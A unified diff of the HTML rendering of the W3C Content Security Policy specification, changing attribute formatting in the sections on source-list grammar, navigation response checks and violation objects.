+     <li data-md="">
+      <p>A <dfn class="dfn-paneled" data-dfn-for="directive" data-dfn-type="dfn" data-export="" id="directive-navigation-response-check">navigation response check</dfn>, which takes a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④">request</a>, a navigation type string ("<code>form-submission</code>" or "<code>other</code>"),
   a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response③">response</a>, a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context" id="ref-for-browsing-context">browsing context</a>, a check type string ("<code>source</code>"
   or "<code>response</code>"), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①③">policy</a> as arguments, and is executed during <a href="#should-block-navigation-response">§4.2.6 Should navigation response to navigation request of type from source
     in target be blocked by Content Security Policy?</a>. It returns "<code>Allowed</code>" unless otherwise specified.</p>
     </ol>
     <h4 class="heading settled" data-level="2.3.1" id="framework-directive-source-list"><span class="secno">2.3.1. </span><span class="content">Source Lists</span><a class="self-link" href="#framework-directive-source-list"></a></h4>
-    <p>Many <a data-link-type="dfn" href="#directives" id="ref-for-directives⑤">directives</a>' <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③">values</a> consist of <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="source-lists">source lists</dfn>: <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ordered-set" id="ref-for-ordered-set③">sets</a> of <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#string" id="ref-for-string②">strings</a> which identify content that can be fetched and potentially embedded or
-  executed. Each <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#string" id="ref-for-string③">string</a> represents one of the following types of <dfn class="dfn-paneled" data-dfn-type="dfn" data-export data-lt="source expression" id="source-expression">source
+    <p>Many <a data-link-type="dfn" href="#directives" id="ref-for-directives⑤">directives</a>' <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value③">values</a> consist of <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="source-lists">source lists</dfn>: <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ordered-set" id="ref-for-ordered-set③">sets</a> of <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#string" id="ref-for-string②">strings</a> which identify content that can be fetched and potentially embedded or
+  executed. Each <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#string" id="ref-for-string③">string</a> represents one of the following types of <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" data-lt="source expression" id="source-expression">source
   expression</dfn>:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Keywords such as <a data-link-type="grammar" href="#grammardef-none" id="ref-for-grammardef-none"><code>'none'</code></a> and <a data-link-type="grammar" href="#grammardef-self" id="ref-for-grammardef-self②"><code>'self'</code></a> (which match nothing and the current
   URL’s origin, respectively)</p>
-     <li data-md>
+     <li data-md="">
       <p>Serialized URLs such as <code>https://example.com/path/to/file.js</code> (which matches a specific file) or <code>https://example.com/</code> (which matches everything on that origin)</p>
-     <li data-md>
+     <li data-md="">
       <p>Schemes such as <code>https:</code> (which matches any resource having
   the specified scheme)</p>
-     <li data-md>
+     <li data-md="">
       <p>Hosts such as <code>example.com</code> (which matches any resource on
   the host, regardless of scheme) or <code>*.example.com</code> (which
   matches any resource on the host’s subdomains (and any of
   its subdomains' subdomains, and so on))</p>
-     <li data-md>
+     <li data-md="">
       <p>Nonces such as <code>'nonce-ch4hvvbHDpv7xCSvXCs3BrNggHdTzxUA'</code> (which can match
   specific elements on a page)</p>
-     <li data-md>
+     <li data-md="">
       <p>Digests such as <code>'sha256-abcd...'</code> (which can match specific
   elements on a page)</p>
     </ol>
-    <p>A <dfn data-dfn-type="dfn" data-export id="serialized-source-list">serialized source list<a class="self-link" href="#serialized-source-list"></a></dfn> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string③">ASCII string</a>, consisting of a
+    <p>A <dfn data-dfn-type="dfn" data-export="" id="serialized-source-list">serialized source list<a class="self-link" href="#serialized-source-list"></a></dfn> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-string" id="ref-for-ascii-string③">ASCII string</a>, consisting of a
   whitespace-delimited series of <a data-link-type="dfn" href="#source-expression" id="ref-for-source-expression①">source expressions</a>, adhering to the following ABNF grammar <a data-link-type="biblio" href="#biblio-rfc5234">[RFC5234]</a>:</p>
-<pre><dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-serialized-source-list">serialized-source-list</dfn> = ( <a data-link-type="grammar" href="#grammardef-source-expression" id="ref-for-grammardef-source-expression">source-expression</a> *( <a data-link-type="grammar" href="#grammardef-required-ascii-whitespace" id="ref-for-grammardef-required-ascii-whitespace②">required-ascii-whitespace</a> <a data-link-type="grammar" href="#grammardef-source-expression" id="ref-for-grammardef-source-expression①">source-expression</a> ) ) / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-none">'none'</dfn>"
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-source-expression">source-expression</dfn>      = <a data-link-type="grammar" href="#grammardef-scheme-source" id="ref-for-grammardef-scheme-source">scheme-source</a> / <a data-link-type="grammar" href="#grammardef-host-source" id="ref-for-grammardef-host-source">host-source</a> / <a data-link-type="grammar" href="#grammardef-keyword-source" id="ref-for-grammardef-keyword-source">keyword-source</a>
+<pre><dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-serialized-source-list">serialized-source-list</dfn> = ( <a data-link-type="grammar" href="#grammardef-source-expression" id="ref-for-grammardef-source-expression">source-expression</a> *( <a data-link-type="grammar" href="#grammardef-required-ascii-whitespace" id="ref-for-grammardef-required-ascii-whitespace②">required-ascii-whitespace</a> <a data-link-type="grammar" href="#grammardef-source-expression" id="ref-for-grammardef-source-expression①">source-expression</a> ) ) / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-none">'none'</dfn>"
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-source-expression">source-expression</dfn>      = <a data-link-type="grammar" href="#grammardef-scheme-source" id="ref-for-grammardef-scheme-source">scheme-source</a> / <a data-link-type="grammar" href="#grammardef-host-source" id="ref-for-grammardef-host-source">host-source</a> / <a data-link-type="grammar" href="#grammardef-keyword-source" id="ref-for-grammardef-keyword-source">keyword-source</a>
                          / <a data-link-type="grammar" href="#grammardef-nonce-source" id="ref-for-grammardef-nonce-source">nonce-source</a> / <a data-link-type="grammar" href="#grammardef-hash-source" id="ref-for-grammardef-hash-source">hash-source</a>
 
 ; Schemes: "https:" / "custom-scheme:" / "another.custom-scheme:"
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-scheme-source">scheme-source</dfn> = <a data-link-type="grammar" href="#grammardef-scheme-part" id="ref-for-grammardef-scheme-part">scheme-part</a> ":"
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-scheme-source">scheme-source</dfn> = <a data-link-type="grammar" href="#grammardef-scheme-part" id="ref-for-grammardef-scheme-part">scheme-part</a> ":"
 
 ; Hosts: "example.com" / "*.example.com" / "https://*.example.com:12/path/to/file.js"
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-host-source">host-source</dfn> = [ <a data-link-type="grammar" href="#grammardef-scheme-part" id="ref-for-grammardef-scheme-part①">scheme-part</a> "://" ] <a data-link-type="grammar" href="#grammardef-host-part" id="ref-for-grammardef-host-part">host-part</a> [ ":" <a data-link-type="grammar" href="#grammardef-port-part" id="ref-for-grammardef-port-part">port-part</a> ] [ <a data-link-type="grammar" href="#grammardef-path-part" id="ref-for-grammardef-path-part">path-part</a> ]
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-scheme-part">scheme-part</dfn> = <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc3986#section-3.1" id="ref-for-section-3.1">scheme</a>
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-host-source">host-source</dfn> = [ <a data-link-type="grammar" href="#grammardef-scheme-part" id="ref-for-grammardef-scheme-part①">scheme-part</a> "://" ] <a data-link-type="grammar" href="#grammardef-host-part" id="ref-for-grammardef-host-part">host-part</a> [ ":" <a data-link-type="grammar" href="#grammardef-port-part" id="ref-for-grammardef-port-part">port-part</a> ] [ <a data-link-type="grammar" href="#grammardef-path-part" id="ref-for-grammardef-path-part">path-part</a> ]
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-scheme-part">scheme-part</dfn> = <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc3986#section-3.1" id="ref-for-section-3.1">scheme</a>
               ; <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc3986#section-3.1" id="ref-for-section-3.1①">scheme</a> is defined in section 3.1 of RFC 3986.
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-host-part">host-part</dfn>   = "*" / [ "*." ] 1*<a data-link-type="grammar" href="#grammardef-host-char" id="ref-for-grammardef-host-char">host-char</a> *( "." 1*<a data-link-type="grammar" href="#grammardef-host-char" id="ref-for-grammardef-host-char①">host-char</a> )
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-host-char">host-char</dfn>   = <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1⑦">ALPHA</a> / <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1⑧">DIGIT</a> / "-"
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-port-part">port-part</dfn>   = 1*<a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1⑨">DIGIT</a> / "*"
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-path-part">path-part</dfn>   = <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc3986#section-3.3" id="ref-for-section-3.3">path-absolute</a> (but not including ";" or ",")
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-host-part">host-part</dfn>   = "*" / [ "*." ] 1*<a data-link-type="grammar" href="#grammardef-host-char" id="ref-for-grammardef-host-char">host-char</a> *( "." 1*<a data-link-type="grammar" href="#grammardef-host-char" id="ref-for-grammardef-host-char①">host-char</a> )
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-host-char">host-char</dfn>   = <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1⑦">ALPHA</a> / <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1⑧">DIGIT</a> / "-"
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-port-part">port-part</dfn>   = 1*<a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1⑨">DIGIT</a> / "*"
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-path-part">path-part</dfn>   = <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc3986#section-3.3" id="ref-for-section-3.3">path-absolute</a> (but not including ";" or ",")
               ; <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc3986#section-3.3" id="ref-for-section-3.3①">path-absolute</a> is defined in section 3.3 of RFC 3986.
 
 ; Keywords:
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-keyword-source">keyword-source</dfn> = "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-self">'self'</dfn>" / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-unsafe-inline">'unsafe-inline'</dfn>" / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-unsafe-eval">'unsafe-eval'</dfn>"
-                 / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-strict-dynamic">'strict-dynamic'</dfn>" / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-unsafe-hashes">'unsafe-hashes'</dfn>" /
-                 / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-report-sample">'report-sample'</dfn>" / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-unsafe-allow-redirects">'unsafe-allow-redirects'</dfn>"
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-keyword-source">keyword-source</dfn> = "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-self">'self'</dfn>" / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-unsafe-inline">'unsafe-inline'</dfn>" / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-unsafe-eval">'unsafe-eval'</dfn>"
+                 / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-strict-dynamic">'strict-dynamic'</dfn>" / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-unsafe-hashes">'unsafe-hashes'</dfn>" /
+                 / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-report-sample">'report-sample'</dfn>" / "<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-unsafe-allow-redirects">'unsafe-allow-redirects'</dfn>"
 
 ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
 
 ; Nonces: 'nonce-[nonce goes here]'
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-nonce-source">nonce-source</dfn>  = "'nonce-" <a data-link-type="grammar" href="#grammardef-base64-value" id="ref-for-grammardef-base64-value">base64-value</a> "'"
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-base64-value">base64-value</dfn>  = 1*( <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1①⓪">ALPHA</a> / <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1①①">DIGIT</a> / "+" / "/" / "-" / "_" )*2( "=" )
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-nonce-source">nonce-source</dfn>  = "'nonce-" <a data-link-type="grammar" href="#grammardef-base64-value" id="ref-for-grammardef-base64-value">base64-value</a> "'"
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-base64-value">base64-value</dfn>  = 1*( <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1①⓪">ALPHA</a> / <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc5234#appendix-B.1" id="ref-for-appendix-B.1①①">DIGIT</a> / "+" / "/" / "-" / "_" )*2( "=" )
 
 ; Digests: 'sha256-[digest goes here]'
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-hash-source">hash-source</dfn>    = "'" <a data-link-type="grammar" href="#grammardef-hash-algorithm" id="ref-for-grammardef-hash-algorithm">hash-algorithm</a> "-" <a data-link-type="grammar" href="#grammardef-base64-value" id="ref-for-grammardef-base64-value①">base64-value</a> "'"
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-hash-algorithm">hash-algorithm</dfn> = "sha256" / "sha384" / "sha512"
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-hash-source">hash-source</dfn>    = "'" <a data-link-type="grammar" href="#grammardef-hash-algorithm" id="ref-for-grammardef-hash-algorithm">hash-algorithm</a> "-" <a data-link-type="grammar" href="#grammardef-base64-value" id="ref-for-grammardef-base64-value①">base64-value</a> "'"
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-hash-algorithm">hash-algorithm</dfn> = "sha256" / "sha384" / "sha512"
 </pre>
     <p>The <a data-link-type="grammar" href="#grammardef-host-char" id="ref-for-grammardef-host-char②">host-char</a> production intentionally contains only ASCII
   characters; internationalized domain names cannot be entered directly as part
@@ -2251,31 +2204,31 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   reduce the complexity for the server-side operator (encodings, etc), but the user agent
   doesn’t actually care about any underlying value, nor does it do any decoding of the <a data-link-type="grammar" href="#grammardef-nonce-source" id="ref-for-grammardef-nonce-source①">nonce-source</a> value.</p>
     <h3 class="heading settled" data-level="2.4" id="framework-violation"><span class="secno">2.4. </span><span class="content">Violations</span><a class="self-link" href="#framework-violation"></a></h3>
-    <p>A <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="violation">violation</dfn> represents an action or resource which goes against the
+    <p>A <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="violation">violation</dfn> represents an action or resource which goes against the
   set of <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①④">policy</a> objects associated with a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object①">global object</a>.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-global-object">global object</dfn>, which
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-global-object">global object</dfn>, which
   is the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object②">global object</a> whose <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①⑤">policy</a> has been violated.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation①">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-url">url</dfn> which is its <a data-link-type="dfn" href="#violation-global-object" id="ref-for-violation-global-object">global object</a>’s <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url">URL</a></code>.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation②">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-status">status</dfn> which is a
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation①">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-url">url</dfn> which is its <a data-link-type="dfn" href="#violation-global-object" id="ref-for-violation-global-object">global object</a>’s <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url">URL</a></code>.</p>
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation②">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-status">status</dfn> which is a
   non-negative integer representing the HTTP status code of the resource for
   which the global object was instantiated.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation③">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-resource">resource</dfn>, which is
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation③">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-resource">resource</dfn>, which is
   either <code>null</code>, "<code>inline</code>", "<code>eval</code>", or a <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url①">URL</a></code>. It represents the resource
   which violated the policy.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation④">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-referrer">referrer</dfn>, which is either <code>null</code>, or a <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url②">URL</a></code>. It represents the referrer of the resource whose policy
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation④">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-referrer">referrer</dfn>, which is either <code>null</code>, or a <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url②">URL</a></code>. It represents the referrer of the resource whose policy
   was violated.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation⑤">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-policy">policy</dfn>, which is the <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①⑥">policy</a> that has been violated.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation⑥">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-disposition">disposition</dfn>, which is the <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition④">disposition</a> of the <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①⑦">policy</a> that has been violated.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation⑦">violation</a> has an <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-effective-directive">effective directive</dfn> which is a non-empty string representing the <a data-link-type="dfn" href="#directives" id="ref-for-directives⑥">directive</a> whose
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation⑤">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-policy">policy</dfn>, which is the <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①⑥">policy</a> that has been violated.</p>
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation⑥">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-disposition">disposition</dfn>, which is the <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition④">disposition</a> of the <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①⑦">policy</a> that has been violated.</p>
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation⑦">violation</a> has an <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-effective-directive">effective directive</dfn> which is a non-empty string representing the <a data-link-type="dfn" href="#directives" id="ref-for-directives⑥">directive</a> whose
   enforcement caused the violation.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation⑧">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-source-file">source file</dfn>, which is
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation⑧">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-source-file">source file</dfn>, which is
   either <code>null</code> or a <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url③">URL</a></code>.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation⑨">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-line-number">line number</dfn>, which is
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation⑨">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-line-number">line number</dfn>, which is
   a non-negative integer.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation①⓪">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-column-number">column number</dfn>, which
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation①⓪">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-column-number">column number</dfn>, which
   is a non-negative integer.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation①①">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-element">element</dfn>, which is either <code>null</code> or an element.</p>
-    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation①②">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export id="violation-sample">sample</dfn>,
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation①①">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-element">element</dfn>, which is either <code>null</code> or an element.</p>
+    <p>Each <a data-link-type="dfn" href="#violation" id="ref-for-violation①②">violation</a> has a <dfn class="dfn-paneled" data-dfn-for="violation" data-dfn-type="dfn" data-export="" id="violation-sample">sample</dfn>,
   which is a string. It is the empty string unless otherwise specified.</p>
     <p class="note" role="note"><span>Note:</span> A <a data-link-type="dfn" href="#violation" id="ref-for-violation①③">violation</a>’s <a data-link-type="dfn" href="#violation-sample" id="ref-for-violation-sample①">sample</a> will be populated with the first 40
   characters of an inline script, event handler, or style that caused an violation. Violations
@@ -2283,27 +2236,27 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
     <h4 class="heading settled algorithm" data-algorithm="Create a violation object for global, policy, and directive" data-level="2.4.1" id="create-violation-for-global"><span class="secno">2.4.1. </span><span class="content"> Create a violation object for <var>global</var>, <var>policy</var>, and <var>directive</var> </span><a class="self-link" href="#create-violation-for-global"></a></h4>
     <p>Given a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object③">global object</a> (<var>global</var>), a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object①⑧">policy</a> (<var>policy</var>), and a <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#string" id="ref-for-string④">string</a> (<var>directive</var>), the following algorithm creates a new <a data-link-type="dfn" href="#violation" id="ref-for-violation①④">violation</a> object, and populates it with an initial set of data:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>violation</var> be a new <a data-link-type="dfn" href="#violation" id="ref-for-violation①⑤">violation</a> whose <a data-link-type="dfn" href="#violation-global-object" id="ref-for-violation-global-object①">global
   object</a> is <var>global</var>, <a data-link-type="dfn" href="#violation-policy" id="ref-for-violation-policy">policy</a> is <var>policy</var>, <a data-link-type="dfn" href="#violation-effective-directive" id="ref-for-violation-effective-directive">effective directive</a> is <var>directive</var>, and <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource">resource</a> is <code>null</code>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the user agent is currently executing script, and can extract a source
   file’s URL, line number, and column number from the <var>global</var>, set <var>violation</var>’s <a data-link-type="dfn" href="#violation-source-file" id="ref-for-violation-source-file">source file</a>, <a data-link-type="dfn" href="#violation-line-number" id="ref-for-violation-line-number">line
   number</a>, and <a data-link-type="dfn" href="#violation-column-number" id="ref-for-violation-column-number">column number</a> accordingly.</p>
-      <p class="issue" id="issue-ee968c9a"><a class="self-link" href="#issue-ee968c9a"></a> Is this kind of thing specified anywhere? I didn’t see anything
+      <p class="issue" id="issue-c404edb5"><a class="self-link" href="#issue-c404edb5"></a> Is this kind of thing specified anywhere? I didn’t see anything
   that looked useful in <a data-link-type="biblio" href="#biblio-ecma262">[ECMA262]</a>.</p>
       <p class="note" role="note"><span>Note:</span> User agents need to ensure that the <a data-link-type="dfn" href="#violation-source-file" id="ref-for-violation-source-file①">source file</a> is the URL requested by
   the page, pre-redirects. If that’s not possible, user agents need to strip the URL down to an
   origin to avoid unintentional leakage.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>global</var> is a <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/window-object.html#window" id="ref-for-window">Window</a></code> object, set <var>violation</var>’s <a data-link-type="dfn" href="#violation-referrer" id="ref-for-violation-referrer">referrer</a> to <var>global</var>’s <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/window-object.html#dom-document-2" id="ref-for-dom-document-2">document</a></code>'s <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/dom.html#dom-document-referrer" id="ref-for-dom-document-referrer">referrer</a></code>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Set <var>violation</var>’s <a data-link-type="dfn" href="#violation-status" id="ref-for-violation-status">status</a> to the HTTP status code
   for the resource associated with <var>violation</var>’s <a data-link-type="dfn" href="#violation-global-object" id="ref-for-violation-global-object②">global
   object</a>.</p>
-      <p class="issue" id="issue-d43ce829"><a class="self-link" href="#issue-d43ce829"></a> How, exactly, do we get the status code? We don’t actually store it
+      <p class="issue" id="issue-99576800"><a class="self-link" href="#issue-99576800"></a> How, exactly, do we get the status code? We don’t actually store it
   anywhere.</p>
-     <li data-md>
+     <li data-md="">
       <p>Return <var>violation</var>.</p>
     </ol>
     <h4 class="heading settled algorithm" data-algorithm="Create a violation object for request, and policy." data-level="2.4.2" id="create-violation-for-request"><span class="secno">2.4.2. </span><span class="content"> Create a violation object for <var>request</var>, and <var>policy</var>. </span><a class="self-link" href="#create-violation-for-request"></a></h4>
@@ -2311,15 +2264,15 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   the following algorithm creates a new <a data-link-type="dfn" href="#violation" id="ref-for-violation①⑥">violation</a> object,
   and populates it with an initial set of data:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>directive</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
